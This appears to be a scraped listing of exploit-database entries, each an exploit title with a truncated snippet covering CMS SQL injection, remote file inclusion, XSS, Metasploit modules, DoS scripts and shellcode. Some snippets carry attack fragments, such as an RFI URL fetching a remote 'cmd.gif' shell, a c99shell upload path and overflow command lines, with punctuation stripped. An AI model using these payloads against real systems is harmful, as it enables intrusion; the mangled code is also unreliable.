webSPELL <= 4.01.02 Remote PHP Code Execution Exploit

No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; Admin id: 1 Admin hash: 7b24afc8bc80e548d66c4e7ff72171c5 Logged in wsauth=1%3A7b24afc8bc80e548d66c4e7ff72171c5 Trying to upload the malicious file Done http://localhost/webspell4.01.02/downloads/c99shell.php if$ar...

DD-WRT v24-sp1 - (CSRF) Cross Site Reference Forgery Exploit

No description provided by source. Remote root dd-wrt -------------------------------------------------------------------------------- Written by Michael Brooks Special thanks to str0ke Exploits tested on the newist stable version: Firmware: DD-WRT v24-sp1 07/27/08 micro Product Homepage:...

Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1756/info If Index Server is enabled in Microsoft Internet Information Server 5.0, it is possible for a remote user to view the entire root directory structure and all sub-directories due to a flaw in the Web Distributed...

AstroCMS Multiple Vulnerabilities

No description provided by source. Exploit Title: AstroCMS Multiple Remote Vulnerabilities Google Dork: none Date: 12.03.2011 Author: brainpillow Software Link: http://www.astrocms.com/ Version: UNKNOWN ============================================================ FORGOTPASSWORD SQL-INJ EXPLOIT:...

vBulletin 3.6.10/3.7.2 '$newpm[title]' Parameter Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/30777/info vBulletin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the...

NT IIS4 Remote Web-Based Administration Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/189/info Web-based administration for IIS 4.0 is, by default, limited to the local loopback address, 127.0.0.1. In instances where IIS4.0 was installed as an upgrade to IIS 2.0 or 3.0, a legacy ISAPI DLL ISM.DLL is left i...

Java storeImageArray() Invalid Array Indexing Vulnerability

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex' class...

Adobe Acrobat Reader and Flash - 'newfunction' Remote Code Execution Vulnerability

No description provided by source. ''' | / |/ \ /\ | | | | \ | \ / | | | | / \ | | | | | | | |/| | | | |/ /\ | | | | | | | | || / \ || | | | || ||// \/|/ http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/...

Media Player Classic 1.3.1774.0 - (mpcpl) Local DoS (PoC) (0day)

No description provided by source. !\C:\Perl\bin In The Name Of Allah The Mercifull Title : Media Player Classic V1.3.1774.0 mpcpl 0day suffer from local Denial of Service PoC Tested : Windows xp sp3 AUThoR: R3d-D3v!L Credits to : XP10HACKER XP10.ME-xp10.com print qq Media Player Classic...

Campsite 2.6.1 User.php g_documentRoot Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. Exploiting this issue allows remote attackers to execute code in the context of the webserver. This issue affects Campsite 2.6.1. Earlier...

Interspire TrackPoint NX Index.PHP Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/16214/info TrackPoint NX is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary...

Claroline 1.x admin/campusProblem.php view Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/25521/info Claroline is prone to a local file-include vulnerability and multiple cross-site scripting vulnerabilities. An attacker could exploit these issues to execute local script code in the context of the application...

Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/299/info The full physical path name for the IIS web server root directory may be obtained by attempting to view a non-existent .IDC file. The web server will return an error message that lists the absolute pathname of th...

Blender 2.34, 2.35a, 2.4, 2.49b .blend File Command Injection

No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Blender .blend Project Arbitrary Command Execution 1. Advisory Information Title: Blender .blend Project Arbitrary Command Executio...

Bubla <= 0.9.2 (bu_dir) Multiple Remote File Include Vulnerabilities

No description provided by source. DeltasecurityTEAM WwW.Deltasecurity.iR Portal Name = Bubla 0.9.1 Class = Remote File Inclusion Risk = High Remote File Execution Download = http://download.sourceforge.net/pub/sourceforge/b/bu/bubla/bubla-0.9.1.tar.gz Discoverd By = DeltahackingTEAM User In Delt...

digiSHOP 2.0.2 - SQL Injection Vulnerability

No description provided by source. ----------------------------------- TM | | | Y | | | | |. 1 ||||.| | | | |. | -|. |-' | |: | | |: | | |::.|:. | |::.| | --- ---' ---' | Private Place Of 0days | ----------------------------------- ^Exploit Title : ^Date : 23/7/2010 ^Vendor Site :...

Sun Java System Web Server 6.1/7.0 WebDAV Format String Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/37910/info Sun Java System Web Server is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input. The issue affects the WebDAV functionality. Currently very few technical details a...

AIDeX Mini-WebServer <= 1.1 - Remote Denial of Service Crash Exploit

No description provided by source. import socket print --------------------------------------------------------------------- print AID'eX Mini-Webserver Verion 1.1 early Release 3 Denial of Service print url: http://www.aidex.de/software/webserver/ print author: shinnai print mail:...

CA BrightStor HSM <= r11.5 - Remote Stack Based Overflow / DoS

No description provided by source. !/usr/bin/perl C@@@@@ O@@@@@@@ C@@@@@ O@@@@@@O C@@@@@@@@@o C@@@@@@@@@@@@@@@@O C@@@@@@@@@@@@@@@@O C@@@@@@@@@@@@@o C@@@@@@o .8@@@@@@. C@@@@@@o 8@@@@@@. @@@@@@O .@@o C@@@@@ @@@@@@c C@@@@@ @@@@@@c C@@@@@c C@@@@@ O@@@@@: C@@@@@ O@@@@@: @@@@@@ C@@@@@ O@@@@@: C@@@@@...

SGI IRIX 5.3/6.2,SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/72/info Under normal operation LicenseManager1M is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager1M to overwrit...

PineApp Mail-SeCure livelog.html Arbitrary Command Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

MiNBank 1.5.0 - Multiple Remote File Inclusion Vulnerability

No description provided by source. Author : By DaRkLiFe Greetz : str0ke & S.VV.A.T. Script : Micronation Banking Systemminba 1.5.0 Remote File Inclusion Vulnerabilitys Download: http://downloads.sourceforge.net/minbank/minbav0150.zip?modtime=1169500084&bigmirror=0 Exploit :...

MDBMS 0.96/0.99 Query Display Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/2867/info MDBMS is a free relational database management system. A buffer overflow condition exists in MDBMS. By issuing the '\s' command to display the query buffer when it contains a large amount of data, it may be...

Woltlab 1.1/2.x Info-DB Info_db.PHP Multiple SQL Injection Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/15214/info Info-DB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to...

NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses

No description provided by source. source: http://www.securityfocus.com/bid/31853/info MIFARE Classic is prone to multiple security weaknesses: 1. A security weakness may allow attackers to recover the internal state of the linear feedback shift register. 2. A security weakness may allow attacker...

Gphotos 1.4/1.5 diapo.php rep Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/17967/info Gphotos is prone to multiple input-validation vulnerabilities. The issues include information-disclosure and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properl...

TrouSerS Denial of Service Vulnerability

No description provided by source. crashtcsd.py Copyright c 2012 Andy Lutomirski. All rights reserved. Permission is granted to anyone to copy and redistribute this file verbatim. Permission is not granted to distribute modified copies or derivative works. import struct import socket import time...

4images 1.7.9 - Multiple Vulnerabilities

No description provided by source. ================================ Vulnerability ID: HTB22950 Reference: http://www.htbridge.ch/advisory/sqlinjectionin4images.html Product: 4images Vendor: http://www.4homepages.de/ http://www.4homepages.de/ Vulnerable Version: 1.7.9 Vendor Notification: 07 April...

Portix-PHP 0.4 Index.PHP Directory Traversal Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/4038/info Portix-PHP is freely available web portal software. It is written in PHP and will run on most Unix and Linux variants. Portix-PHP is prone to directory traversal attacks. The script index.php does not sufficient...

Joomla Kunena Component (index.php, search parameter) SQL Injection

No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register import re class TestPOCPOCBase: vulID = '75964' ssvid version = '1.0' author = 'kikay' vulDate = '2012-11-21' createDate ...

TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability

No description provided by source. Tagmin C.C 2.1.B Remote File Include +Advisory 3 +Product :Tagmin Control Center 2.1.B +Develop: http://ds3.bbminc.net/tagit2b/ +Dork: inurl:/tagit2b/ +Vulnerable: Remote File Include +Risk:High +Discovered:by Kernel-32 +Contact: [email protected] +Homepag...

Wordpress Relocate Upload Plugin 0.14 Remote File Inclusion

在relocate-upload.php文件第16行,没有对传入的abspath进行过滤,导致任意文件本地远程文件包含 if isset$GET'rufolder' // WP setup and function access define'WPUSETHEMES', false; requireonceurldecode$GET'abspath'.'/wp-load.php'; // save us looking for it, it's passed as a GET parameterarameter...

Saxon 5.4 Menu.PHP Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/26237/info Saxon is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser...

Nagios Plugin check_ups Local Buffer Overflow PoC

No description provided by source. Advisory: Nagios Plugin 'checkups' local buffer overflow Author: Stefan Schurtz Contact: [email protected] Affected Software: Successfully tested on nagios-plugins-1.4.15 Vendor URL: http://nagiosplugins.org/ ./checkups -u perl -e 'print Ax16407' buffer...

UFO: Alien Invasion 2.2.1 - Remote Arbitrary Code Execution Vulnerability

No description provided by source. Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion -------------------------------------------------------------------- June 18th, 2010 ======= Summary ======= Name: Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion Release...

netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 29 bytes

No description provided by source. / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve/bin//sh, ..., NULL; note: unsafe shellcode, but 29 bytes long; doesn't work if eax & 0x40000000 != 0; / include sys/types.h include stdio.h include string.h char scode = \x99 // cltd...

Sun Java JRE getSoundbank file:// URI Buffer Overflow

No description provided by source. $Id: javagetsoundbankbof.rb 10394 2010-09-20 08:06:27Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and term...

MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def...

Joomla Component com_wmtpic 1.0 - SQL Injection Vulnerability

No description provided by source. 1 1 0 I'm RoAdKiLlEr member from Inj3ct0r Team 1 1 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 +Title : Joomla Component comwmtpic SQL Injection Vulnerability +Author : RoAdKiLlEr +Contact : RoAdKiLlEratKhg-CrewdotWs +Tested on : W...

jira 4.4.3, greenhopper < 5.9.8 - Multiple Vulnerabilities

No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 CVE-2012-1500, Stored XSS in JIRA v4.4.3663-r165197, GreenHopper Resolved in Version 5.9.8, Proof of Concept External References: CVE-2112-1500 CVE-2112-1500 XSS.Cx Blog GHS-5642 Reported to Vendor on Mar 7, 2012,...

IceWarp Universal WebMail /mail/include.html - Crafted HTTP_USER_AGENT Arbitrary File Access

No description provided by source. source: http://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. An attacker can explo...

Microsoft Windows XP/ME Help and Support Center Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/6966/info The Microsoft Windows ME Help and Support Center is prone to a buffer overflow. This is due to insufficient bounds checking on input supplied through the HCP URI parameter. An attacker can exploit this...

CoolForum 0.x Editpost.PHP SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/18268/info CoolForum is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow...

phpBazar <= 2.1.0 - Remote (Include/Auth Bypass) Vulnerabilities

No description provided by source. Title: phpBazar = 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password:...

TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - CSRF Vulnerability

No description provided by source...

TYPSoft FTP Server 1.10 - RETR Command DoS

No description provided by source. Tested on: Windows XP, SP2 EN !/usr/bin/python print \n print RedTeam Security print TYPSoft FTP Server RETR Command DoS print Version 1.10 print print Jeremiah Talamantes print [email protected] print \n import socket import sys Description: RETR command...

ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router Information Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/20834/info ECI Telecom's B-FOCuS ADSL2+ Combo332+ wireless router is prone to an information-disclosure vulnerability. The router's Web-Based Management interface fails to authenticate users before providing access to...

ESET Smart Security <= 3.0.672 (epfw.sys) Privilege Escalation Exploit

No description provided by source. //////////////////////////////////////////////////////////////////////////////////// // +----------------------------------------------------------------------------+ // // | | // // | ESET, LLC. - http://www.eset.com/ | // // | | // // | Affected Software: | //...

GNU Mailman 2.0.x Admin Login Variant Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/5299/info GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code. A user visiting the link...

ADODB < 4.70 (tmssql.php) Denial of Service Vulnerability

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo ADODB tmssql.php Denial of service\r\n; echo by rgod [email protected]\r\n; echo site: http://retrogod.altervista.org\r\n\r\n; if $argc4 echo Usage: php .$argv0. host path redo OPTIONS\r\n; echo host: target server...